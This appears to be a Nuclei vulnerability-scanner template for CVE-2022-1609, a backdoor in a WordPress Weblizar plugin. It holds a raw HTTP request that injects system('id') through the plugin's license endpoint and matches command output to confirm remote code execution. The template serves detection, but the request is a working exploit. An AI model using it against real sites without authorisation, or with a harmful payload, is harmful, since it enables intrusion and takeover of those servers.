36 lines
735 B
YAML
36 lines
735 B
YAML
|
id: CVE-2022-1609
|
||
|
|
||
|
info:
|
||
|
name: WordPress Weblizar Backdoor - RCE
|
||
|
author: For3stCo1d
|
||
|
severity: critical
|
||
|
reference:
|
||
|
- https://twitter.com/momika233/status/1529694086193508353
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
|
||
|
tags: cve2022,wordpress,rce
|
||
|
|
||
|
variables:
|
||
|
payload: "id"
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-json/am-member/license HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
blowfish=1&blowf=system('{{payload}}');
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- 'uid='
|
||
|
- 'groups='
|
||
|
- 'gid='
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|